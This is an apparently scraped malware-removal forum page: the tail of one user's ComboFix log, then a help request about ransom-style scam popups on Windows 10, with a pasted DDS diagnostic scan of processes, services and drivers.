2014-05-01 14:13 470016 ----a-w- c:\users\Usuario\AppData\Local\MEGAsync\ShellExtX64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00avast]
@="{472083B0-C522-11CF-8763-00608CC02F24}"
[HKEY_CLASSES_ROOT\CLSID\{472083B0-C522-11CF-8763-00608CC02F24}]
2016-11-10 01:31 1031520 ----a-w- c:\program files\AVAST Software\Avast\ashShA64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1MediaFireIconError]
@="{5EE8C634-CDC0-453D-9731-DF0B19F4E807}"
[HKEY_CLASSES_ROOT\CLSID\{5EE8C634-CDC0-453D-9731-DF0B19F4E807}]
2015-04-23 13:10 89600 ----a-w- c:\program files (x86)\MediaFire Desktop\MediaFireIcon3_c1e50.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1MediaFireIconReadOnly]
@="{7995D0FC-769B-4197-AEC0-991921CB99E1}"
[HKEY_CLASSES_ROOT\CLSID\{7995D0FC-769B-4197-AEC0-991921CB99E1}]
2015-04-23 13:10 89088 ----a-w- c:\program files (x86)\MediaFire Desktop\MediaFireIcon5_c1e50.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1MediaFireIconSynched]
@="{9A3B79CB-D899-40B5-8DBC-20447F1ADC8F}"
[HKEY_CLASSES_ROOT\CLSID\{9A3B79CB-D899-40B5-8DBC-20447F1ADC8F}]
2015-04-23 13:10 84992 ----a-w- c:\program files (x86)\MediaFire Desktop\MediaFireIcon_c1e50.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1MediaFireIconSyncing]
@="{C4D81971-6B13-4173-AB21-F83AD20CCC04}"
[HKEY_CLASSES_ROOT\CLSID\{C4D81971-6B13-4173-AB21-F83AD20CCC04}]
2015-04-23 13:10 86528 ----a-w- c:\program files (x86)\MediaFire Desktop\MediaFireIcon2_c1e50.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\MediaFireIconLock]
@="{759F3E92-F4E8-4953-8315-238B8B17E0F3}"
[HKEY_CLASSES_ROOT\CLSID\{759F3E92-F4E8-4953-8315-238B8B17E0F3}]
2015-04-23 13:10 84992 ----a-w- c:\program files (x86)\MediaFire Desktop\MediaFireIcon4_c1e50.dll
.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost - NetSvcs
UxTuneUp
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mStart Page = https://www.google.com/?trackid=sp-006
mLocal Page = c:\windows\SysWOW64\blank.htm
mSearch Page = https://www.google.com/search?trackid=sp-006&q={searchTerms}
mSearch Bar = https://www.google.com/?trackid=sp-006
uInternet Settings,ProxyOverride = *.local
IE: E&xportar a Microsoft Excel - c:\progra~2\MICROS~3\Office12\EXCEL.EXE/3000
Trusted Zone: eac-cdn.com\download
TCP: DhcpNameServer = 10.206.133.89 8.8.8.8
FF - ProfilePath - c:\users\Usuario\AppData\Roaming\Mozilla\Firefox\Profiles\s4ofnc2w.default-1478814350888\
.
- - - - ORPHANS REMOVED - - - -
.
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
AddRemove-AVG PC TuneUp - c:\program files (x86)\AVG\AVG PC TuneUp\..\Setup\avgsetupx.exe
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\X6va029]
"ImagePath"="\??\c:\windows\SysWOW64\Drivers\X6va029"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks]
"SymbolicLinkValue"=hex(6):5c,00,52,00,65,00,67,00,69,00,73,00,74,00,72,00,79,
00,5c,00,4d,00,61,00,63,00,68,00,69,00,6e,00,65,00,5c,00,53,00,6f,00,66,00,\
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
------------------------ Other Running Processes ------------------------
.
c:\program files\AVAST Software\Avast\AvastSvc.exe
c:\program files (x86)\Smadav\SMc:\windows\jmesoft\Service.exe
c:\program files (x86)\Malwarebytes Anti-Malware\mbam.exe
c:\program files (x86)\Lenovo\YouCam\YCMMirage.exe
.
**************************************************************************
.
Completion time: 2016-11-11 21:03:58 - machine was rebooted
ComboFix-quarantined-files.txt 2016-11-12 03:03
.
Pre-Run: 184,567,595,008 bytes libres
Post-Run: 184,226,881,536 bytes libres
.
- - End Of File - - 7CBA2A9E6D4060F20807B7F6BEDBB3CE
A36C5E4F47E84449FF07ED3517B43A31

↧

Help with removing malaware ?

November 12, 2016, 9:05 pm

≫ Next: Remove unwanted yahoo toolbar

≪ Previous: Houdini Trojan/Worm

I have windows 10 and last few days I have been getting these pop ups blocking my computer or freezing it .. seems to have started when I answered an Woolworths post at least I think so ..
It says this your computer is blocked please ring this number to unblock it and I cant click it off so go to control , alt and delete and then click google and off it goes , now I removed google chrome and back to explorer and its still doing it so please can you give me any help ..
will paste these two you asked to have done in your forum .. please any help with this problem .. thanking you Lorraine Beard..

Windows 10 Pro .
HP 32 bit op system ..
Avast Premier anti virus..

DDS

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 11.0.10586.672
Run by Lorraine at 15:37:48 on 2016-11-13
Microsoft Windows 10 Pro 10.0.10586.0.1252.61.2057.18.3543.1639 [GMT 11:00]
.
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Avast Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Avast Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: Avast Antivirus *Enabled* {2F96FC65-F07D-9D1E-5A6E-3DA5C487EAF0}
.
============== Running Processes ================
.
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\WINDOWS\System32\spoolsv.exe
C:\Program Files\AVAST Software\Avast\afwServ.exe
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
C:\WINDOWS\system32\dashost.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\Program Files\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
C:\Program Files\HP\Shared\hpqwmiex.exe
C:\WINDOWS\System32\dwm.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\taskhostw.exe
C:\Windows\System32\RuntimeBroker.exe
C:\WINDOWS\Explorer.EXE
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\WINDOWS\system32\SettingSyncHost.exe
C:\Program Files\AVAST Software\Avast\avastui.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\CCleaner\CCleaner.exe
C:\WINDOWS\System32\fontdrvhost.exe
C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
C:\WINDOWS\system32\ApplicationFrameHost.exe
C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.722.10060.0_x86__8wekyb3d8bbwe\Microsoft.Photos.exe
C:\Program Files\WindowsApps\Microsoft.BingWeather_4.16.15.0_x86__8wekyb3d8bbwe\Microsoft.Msn.Weather.exe
C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
C:\WINDOWS\system32\browser_broker.exe
C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\microsoftedgecp.exe
C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\microsoftedgecp.exe
C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\WINDOWS\system32\SearchFilterHost.exe
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\WINDOWS\system32\conhost.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\WINDOWS\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.live.com/
uLocal Page = %11%\blank.htm
uSearch Bar = hxxp://g.ninemsn.com.au/0SEENAU/SAOS01?FORM=TOOLBR
uSearch Page = hxxp://g.ninemsn.com.au/0SEENAU/SAOS01?FORM=TOOLBR
BHO: Windows Live Toolbar Helper: {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\program files\windows live toolbar\msntb.dll
BHO: HP Network Check Helper: {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - c:\program files\hewlett-packard\hp support framework\resources\hpnetworkcheck\HPNetworkCheckPlugin.dll
TB: Windows Live Toolbar: {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\program files\windows live toolbar\msntb.dll
TB: Windows Live Toolbar: {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\program files\windows live toolbar\msntb.dll
uRun: [OneDrive] "c:\users\lorraine\appdata\local\microsoft\onedrive\OneDrive.exe" /background
uRun: [Skype] "c:\program files\skype\phone\Skype.exe" /minimized /regrun
uRun: [CCleaner Monitoring] "c:\program files\ccleaner\CCleaner.exe" /MONITOR
mRun: [AvastUI.exe] "c:\program files\avast software\avast\AvastUI.exe" /nogui
mRun: [HP Software Update] c:\program files\hp\hp software update\HPWuSchd2.exe
StartupFolder: c:\users\lorraine\appdata\roaming\micros~1\windows\startm~1\programs\startup\sendto~1.lnk - c:\program files\microsoft office\root\office16\ONENOTEM.EXE
mPolicies-System: DSCAutomationHostEnabled = dword:2
mPolicies-System: SoftwareSASGeneration = dword:1
IE: &Windows Live Search - c:\program files\windows live toolbar\msntb.dll/search.htm
IE: E&xport to Microsoft Excel - c:\program files\microsoft office\root\office16\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\program files\microsoft office\root\office16\ONBttnIE.dll/105
IE: {22CC3EBD-C286-43aa-B8E6-06B115F74162} - c:\program files\hewlett-packard\smart print\SmartPrintSetup.exe
IE: {25510184-5A38-4A99-B273-DCA8EEF6CD08} - c:\program files\hewlett-packard\hp support framework\resources\hpnetworkcheck\NCLauncherFromIE.exe
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\program files\microsoft office\root\office16\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - c:\program files\microsoft office\root\office16\ONBttnIELinkedNotes.dll
TCP: NameServer = 10.0.0.138
TCP: Interfaces\{301607f6-596d-48b8-997e-59ddfaedcd4f} : DHCPNameServer = 10.0.0.138
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - c:\program files\microsoft office\root\office16\MSOSB.DLL
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - c:\program files\microsoft office\root\office16\MSOSB.DLL
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - c:\program files\microsoft office\root\office16\MSOSB.DLL
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - c:\program files\microsoft office\root\office16\MSOSB.DLL
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - c:\windows\system32\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - c:\windows\system32\tbauth.dll
SSODL: WebCheck - <orphaned>
LSA: Security Packages = ""
mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - c:\windows\system32\windows.storage.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\lorraine\appdata\roaming\mozilla\firefox\profiles\ji9m222t.default\
FF - prefs.js: browser.search.defaulturl - hxxps://search.avast.com/AV772/search/web?q={searchTerms}
FF - prefs.js: browser.search.selectedEngine - Avast Search
FF - prefs.js: browser.startup.homepage - hxxps://www.google.com.au/
FF - prefs.js: keyword.URL - hxxps://search.avast.com/AV772/search/web?q={searchTerms}
FF - plugin: c:\program files\google\update\1.3.31.5\npGoogleUpdate3.dll
FF - plugin: c:\program files\microsoft office\root\office16\NPSPWRAP.DLL
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_23_0_0_207.dll
.
============= SERVICES / DRIVERS ===============
.
R0 aswRvrt;avast! Revert;c:\windows\system32\drivers\aswRvrt.sys [2016-6-13 60424]
R0 aswVmm;avast! VM Monitor;c:\windows\system32\drivers\aswVmm.sys [2016-6-13 224752]
R0 SCMNdisP;General NDIS Protocol Driver;c:\windows\system32\drivers\SCMNdisP.sys [2016-6-14 21728]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;c:\windows\system32\drivers\WindowsTrustedRT.sys [2015-10-30 86552]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;c:\windows\system32\drivers\WindowsTrustedRTProxy.sys [2015-10-30 15384]
R0 Wof;Windows Overlay File System Filter Driver;c:\windows\system32\drivers\wof.sys [2015-10-30 173408]
R1 ahcache;Application Compatibility Cache;c:\windows\system32\drivers\ahcache.sys [2016-9-15 183296]
R1 aswKbd;aswKbd;c:\windows\system32\drivers\aswKbd.sys [2016-6-13 35096]
R1 aswNetSec;aswNetSec;c:\windows\system32\drivers\aswNetSec.sys [2016-6-13 338936]
R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2016-6-13 735488]
R1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys [2016-6-13 433768]
R1 FileCrypt;FileCrypt;c:\windows\system32\drivers\filecrypt.sys [2016-5-11 76288]
R1 GpuEnergyDrv;GPU Energy Driver;c:\windows\system32\drivers\gpuenergydrv.sys [2015-10-30 7680]
R2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2016-6-13 92256]
R2 aswStm;aswStm;c:\windows\system32\drivers\aswStm.sys [2016-6-13 118664]
R2 avast! Antivirus;Avast Antivirus;c:\program files\avast software\avast\AvastSvc.exe [2016-9-1 197128]
R2 avast! Firewall;Avast Firewall;c:\program files\avast software\avast\afwServ.exe [2016-9-1 223600]
R2 ClickToRunSvc;Microsoft Office Click-to-Run Service;c:\program files\common files\microsoft shared\clicktorun\OfficeClickToRun.exe [2016-6-13 2288320]
R2 CoreMessagingRegistrar;CoreMessaging;c:\windows\system32\svchost.exe -k LocalServiceNoNetwork [2015-10-30 37256]
R2 DiagTrack;Connected User Experiences and Telemetry;c:\windows\system32\svchost.exe -k utcsvc [2015-10-30 37256]
R2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service;c:\program files\hewlett-packard\hp support solutions\HPSupportSolutionsFrameworkService.exe [2016-7-4 29728]
R2 storqosflt;Storage QoS Filter Driver;c:\windows\system32\drivers\storqosflt.sys [2015-10-30 62464]
R2 tiledatamodelsvc;Tile Data model server;c:\windows\system32\svchost.exe -k appmodel [2015-10-30 37256]
R2 UserManager;User Manager;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
R3 ClipSVC;Client License Service (ClipSVC);c:\windows\system32\svchost.exe -k wsappx [2015-10-30 37256]
R3 DsSvc;Data Sharing Service;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
R3 hpqcaslwmiex;HP CASL Framework Service;c:\program files\hp\shared\hpqwmiex.exe [2016-6-3 1031704]
R3 lfsvc;Geolocation Service;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
R3 LicenseManager;Windows License Manager Service;c:\windows\system32\svchost.exe -k LocalService [2015-10-30 37256]
R3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys [2016-9-1 170200]
R3 NcbService;Network Connection Broker;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;c:\windows\system32\drivers\NdisVirtualBus.sys [2015-10-30 15872]
R3 StateRepository;State Repository Service;c:\windows\system32\svchost.exe -k appmodel [2015-10-30 37256]
S2 DoSvc;Delivery Optimization;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S2 MapsBroker;Downloaded Maps Manager;c:\windows\system32\svchost.exe -k NetworkService [2015-10-30 37256]
S2 SkypeUpdate;Skype Updater;c:\program files\skype\updater\Updater.exe [2016-9-20 324224]
S2 WSWNA3100;WSWNA3100;c:\program files\netgear\wna3100\WifiSvc.exe [2016-6-14 285152]
S3 ADP80XX;ADP80XX;c:\windows\system32\drivers\adp80xx.sys [2015-10-30 1038176]
S3 AJRouter;AllJoyn Router Service;c:\windows\system32\svchost.exe -k LocalService [2015-10-30 37256]
S3 AppReadiness;App Readiness;c:\windows\system32\svchost.exe -k AppReadiness [2015-10-30 37256]
S3 AppXSvc;AppX Deployment Service (AppXSVC);c:\windows\system32\svchost.exe -k wsappx [2015-10-30 37256]
S3 aswHwid;avast! HardwareID;c:\windows\system32\drivers\aswHwid.sys [2016-6-13 34008]
S3 bcmfn;bcmfn Service;c:\windows\system32\drivers\bcmfn.sys [2015-10-30 8192]
S3 bcmfn2;bcmfn2 Service;c:\windows\system32\drivers\bcmfn2.sys [2015-10-30 8192]
S3 BthHFSrv;Bluetooth Handsfree Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2015-10-30 37256]
S3 buttonconverter;Service for Portable Device Control devices;c:\windows\system32\drivers\buttonconverter.sys [2015-10-30 26624]
S3 CapImg;HID driver for CapImg touch screen;c:\windows\system32\drivers\capimg.sys [2016-2-24 96768]
S3 DcpSvc;DataCollectionPublishingService;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 DevQueryBroker;DevQuery Background Discovery Broker;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;c:\windows\system32\diagsvcs\DiagnosticsHub.StandardCollector.Service.exe [2015-10-30 26112]
S3 DmEnrollmentSvc;Device Management Enrollment Service;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 dmwappushservice;dmwappushsvc;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 embeddedmode;embeddedmode;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
S3 EntAppSvc;Enterprise App Management Service;c:\windows\system32\svchost.exe -k appmodel [2015-10-30 37256]
S3 fcvsc;fcvsc;c:\windows\system32\drivers\fcvsc.sys [2015-10-30 24064]
S3 genericusbfn;Generic USB Function Class;c:\windows\system32\drivers\genericusbfn.sys [2016-11-9 17408]
S3 GPIO;Intel SoC GPIO Controller Driver;c:\windows\system32\drivers\iaiogpio.sys [2015-10-30 22016]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;c:\windows\system32\drivers\hidinterrupt.sys [2015-10-30 38240]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;c:\windows\system32\drivers\iai2c.sys [2015-10-30 66048]
S3 iaioi2c;Intel(R) Atom(TM) Processor I2C Controller Service;c:\windows\system32\drivers\iaioi2c.sys [2015-10-30 61936]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;c:\windows\system32\drivers\iaStorAV.sys [2015-10-30 524632]
S3 icssvc;Windows Mobile Hotspot Service;c:\windows\system32\svchost.exe -k LocalServiceNetworkRestricted [2015-10-30 37256]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\ieetwcollector.exe [2015-10-30 107008]
S3 intelpep;Intel(R) Power Engine Plug-in Driver;c:\windows\system32\drivers\intelpep.sys [2015-10-30 40288]
S3 IoQos;IoQos;c:\windows\system32\drivers\ioqos.sys [2015-10-30 23040]
S3 LSI_SAS2i;LSI_SAS2i;c:\windows\system32\drivers\lsi_sas2i.sys [2015-10-30 88928]
S3 LSI_SAS3i;LSI_SAS3i;c:\windows\system32\drivers\lsi_sas3i.sys [2015-10-30 83288]
S3 NetSetupSvc;Network Setup Service;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 NgcCtnrSvc;Microsoft Passport Container;c:\windows\system32\svchost.exe -k LocalServiceNetworkRestricted [2015-10-30 37256]
S3 NgcSvc;Microsoft Passport;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
S3 percsas2i;percsas2i;c:\windows\system32\drivers\percsas2i.sys [2015-10-30 51040]
S3 percsas3i;percsas3i;c:\windows\system32\drivers\percsas3i.sys [2015-10-30 51552]
S3 PhoneSvc;Phone Service;c:\windows\system32\svchost.exe -k LocalService [2015-10-30 37256]
S3 RetailDemo;Retail Demo Service;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
S3 SensorDataService;Sensor Data Service;c:\windows\system32\SensorDataService.exe [2016-9-15 900096]
S3 SensorService;Sensor Service;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
S3 SerCx2;Serial UART Support Library;c:\windows\system32\drivers\SerCx2.sys [2015-10-30 121696]
S3 smphost;Microsoft Storage Spaces SMP;c:\windows\system32\svchost.exe -k smphost [2015-10-30 37256]
S3 SmsRouter;Microsoft Windows SMS Router Service.;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
S3 stornvme;Microsoft Standard NVM Express Driver;c:\windows\system32\drivers\stornvme.sys [2015-10-30 65376]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;c:\windows\system32\drivers\storufs.sys [2015-10-30 27992]
S3 TieringEngineService;Storage Tiers Management;c:\windows\system32\TieringEngineService.exe [2015-10-30 256512]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;c:\windows\system32\drivers\UcmCx.sys [2016-5-11 46080]
S3 UcmUcsi;USB Connector Manager UCSI Client;c:\windows\system32\drivers\UcmUcsi.sys [2015-10-30 33792]
S3 UdeCx;USB Device Emulation Support Library;c:\windows\system32\drivers\Udecx.sys [2015-10-30 32768]
S3 UEFI;Microsoft UEFI Driver;c:\windows\system32\drivers\uefi.sys [2015-10-30 23392]
S3 Ufx01000;USB Function Class Extension;c:\windows\system32\drivers\ufx01000.sys [2016-6-15 203104]
S3 UfxChipidea;USB Chipidea Controller;c:\windows\system32\drivers\UfxChipidea.sys [2015-10-30 74080]
S3 ufxsynopsys;USB Synopsys Controller;c:\windows\system32\drivers\ufxsynopsys.sys [2016-9-15 104800]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;c:\windows\system32\drivers\urschipidea.sys [2015-10-30 21856]
S3 UrsCx01000;USB Role-Switch Support Library;c:\windows\system32\drivers\urscx01000.sys [2015-10-30 42840]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;c:\windows\system32\drivers\urssynopsys.sys [2015-10-30 21856]
S3 UsoSvc;Update Orchestrator Service;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 vhf;Virtual HID Framework (VHF) Driver;c:\windows\system32\drivers\vhf.sys [2015-10-30 24064]
S3 vmicguestinterface;Hyper-V Guest Service Interface;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
S3 vmicvmsession;Hyper-V VM Session Service;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2015-10-30 37256]
S3 WalletService;WalletService;c:\windows\system32\svchost.exe -k appmodel [2015-10-30 37256]
S3 wdiwifi;WDI Driver Framework;c:\windows\system32\drivers\WdiWiFi.sys [2016-4-13 497152]
S3 WdNisDrv;Windows Defender Network Inspection System Driver;c:\windows\system32\drivers\WdNisDrv.sys [2015-10-30 98648]
S3 WdNisSvc;Windows Defender Network Inspection Service;c:\program files\windows defender\NisSrv.exe [2015-10-30 280376]
S3 WEPHOSTSVC;Windows Encryption Provider Host Service;c:\windows\system32\svchost.exe -k WepHostSvcGroup [2015-10-30 37256]
S3 workfolderssvc;Work Folders;c:\windows\system32\svchost.exe -k LocalService [2015-10-30 37256]
S3 WpnService;Windows Push Notifications Service;c:\windows\system32\svchost.exe -k wswpnservice [2015-10-30 37256]
S3 XblAuthManager;Xbox Live Auth Manager;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 XblGameSave;Xbox Live Game Save;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 xboxgip;Xbox Game Input Protocol Driver;c:\windows\system32\drivers\xboxgip.sys [2016-3-2 201216]
S3 XboxNetApiSvc;XboxNetApiSvc;c:\windows\system32\svchost.exe -k netsvcs [2015-10-30 37256]
S3 xinputhid;XINPUT HID Filter Driver;c:\windows\system32\drivers\xinputhid.sys [2016-4-13 18944]
S4 CDPSvc;Connected Device Platform Service;c:\windows\system32\svchost.exe -k LocalService [2015-10-30 37256]
S4 tzautoupdate;Auto Time Zone Updater;c:\windows\system32\svchost.exe -k LocalService [2015-10-30 37256]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=c:\windows\system32\NOTEPAD.EXE %1 [UserChoice]
ShellExec: SZBrowser.exe: open="c:\program files\avast software\szbrowser\Launcher.exe" "%1"
.
=============== Created Last 30 ================
.
2016-11-12 14:20:29 -------- d-----w- c:\program files\CCleaner
2016-11-11 11:55:48 -------- d-----w- C:\AdwCleaner
2016-11-09 15:06:58 -------- d-----w- c:\windows\system32\BestPractices
2016-11-09 09:27:59 712704 ----a-w- c:\windows\system32\RemoteNaturalLanguage.dll
2016-11-09 09:26:59 1536088 ----a-w- c:\windows\system32\crypt32.dll
2016-11-09 09:25:58 616960 ----a-w- c:\windows\system32\winhttp.dll
2016-10-30 22:50:50 96200 ----a-w- c:\program files\mozilla firefox\nssdbm3.dll
2016-10-22 11:48:52 210376 ----a-w- c:\program files\mozilla firefox\sandboxbroker.dll
2016-10-22 11:48:51 970912 ----a-w- c:\program files\mozilla firefox\msvcr120.dll
2016-10-22 11:48:51 455328 ----a-w- c:\program files\mozilla firefox\msvcp120.dll
.
==================== Find3M ====================
.
2016-11-12 13:57:51 170200 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2016-11-02 13:32:04 316256 ----a-w- c:\windows\system32\atmfd.dll
2016-11-02 13:31:34 546968 ----a-w- c:\windows\system32\fontdrvhost.exe
2016-11-02 12:51:49 37376 ----a-w- c:\windows\system32\atmlib.dll
2016-10-28 21:48:45 828408 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2016-10-28 21:48:45 176632 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2016-10-25 08:34:10 875992 ----a-w- c:\windows\system32\winresume.efi
2016-10-25 08:34:09 771120 ----a-w- c:\windows\system32\winresume.exe
2016-10-25 08:32:28 927072 ----a-w- c:\windows\system32\winload.exe
2016-10-25 08:32:26 1561392 ----a-w- c:\windows\system32\KernelBase.dll
2016-10-25 08:32:22 1051584 ----a-w- c:\windows\system32\winload.efi
2016-10-25 08:32:20 845568 ----a-w- c:\windows\system32\MrmCoreR.dll
2016-10-25 08:32:19 34088 ----a-w- c:\windows\system32\wldp.dll
2016-10-25 08:32:17 5793632 ----a-w- c:\windows\system32\ntoskrnl.exe
2016-10-25 08:32:09 101216 ----a-w- c:\windows\system32\drivers\mup.sys
2016-10-25 08:32:01 1862000 ----a-w- c:\windows\system32\CoreUIComponents.dll
2016-10-25 08:30:40 1541792 ----a-w- c:\windows\system32\ntdll.dll
2016-10-25 08:30:38 354144 ----a-w- c:\windows\system32\halmacpi.dll
2016-10-25 08:30:29 281440 ----a-w- c:\windows\system32\drivers\clfs.sys
2016-10-25 08:28:59 545432 ----a-w- c:\windows\system32\CoreMessaging.dll
2016-10-25 08:28:58 553808 ----a-w- c:\windows\system32\ci.dll
2016-10-25 08:28:56 1083648 ----a-w- c:\windows\system32\Taskmgr.exe
2016-10-25 08:15:54 433504 ----a-w- c:\windows\system32\pcasvc.dll
2016-10-25 08:15:32 1194328 ----a-w- c:\windows\system32\diagtrack.dll
2016-10-25 08:14:24 856928 ----a-w- c:\windows\system32\SecConfig.efi
2016-10-25 08:08:55 2885680 ----a-w- c:\windows\system32\WSService.dll
